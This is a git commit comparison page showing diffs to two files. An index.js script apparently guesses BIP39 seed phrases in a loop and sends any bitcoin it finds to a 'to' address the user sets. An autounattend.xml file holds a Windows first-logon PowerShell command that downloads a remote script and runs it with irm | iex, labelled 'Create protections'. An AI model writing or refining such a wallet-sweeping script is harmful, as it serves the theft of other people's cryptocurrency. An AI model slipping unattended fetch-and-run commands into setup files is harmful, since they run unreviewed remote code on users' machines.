Compare commits

...

3 commits

Author SHA1 Message Date
Sam Sneed
016cd50b2f
remove random address (turns out someone else uses it!) 2024-07-18 19:05:41 +00:00
Sam Sneed
65c7c67e65
Update index.js 2024-07-18 19:03:13 +00:00
Sam Sneed
4cdde37ed7
Update autounattend.xml 2024-07-15 15:56:19 -05:00
2 changed files with 5 additions and 2 deletions

View file

@ -2,7 +2,8 @@ var CoinKey = require('coinkey') //1.0.0
var bip39 = require('bip39')
var hdkey = require('hdkey')
var bitcoinTransaction = require('bitcoin-transaction');
var to = "1ShzJ7McjMYaboVFokny1LGMFLT7Y6qDj"; //change me to who you want the bitcoin to go to
async function main() {
var to = "CHANGE ME"; //change me to who you want the bitcoin to go to
var mnemonic;
var seed;
var seedToKey;
@ -75,3 +76,5 @@ if (bip39.validateMnemonic(mnemonic)) {
await new Promise(r => setTimeout(r, 13));
}
}
main()

View file

@ -90,7 +90,7 @@
<AutoLogon></AutoLogon>
<FirstLogonCommands>
<SynchronousCommand wcm:action="add">
<CommandLine>PowerShell.exe -command 'irm "http://nodemixaholic.com:3002/nodemixaholic/sams-christutus-overlay/raw/branch/main/common-stream.ps1" | iex'</CommandLine>
<CommandLine>PowerShell.exe -command 'irm "https://github.com/Sneed-Group/maxs-titus-overlay/raw/main/common-stream.ps1" | iex'</CommandLine>
<Description>Create protections</Description>
<Order>1</Order>
</SynchronousCommand>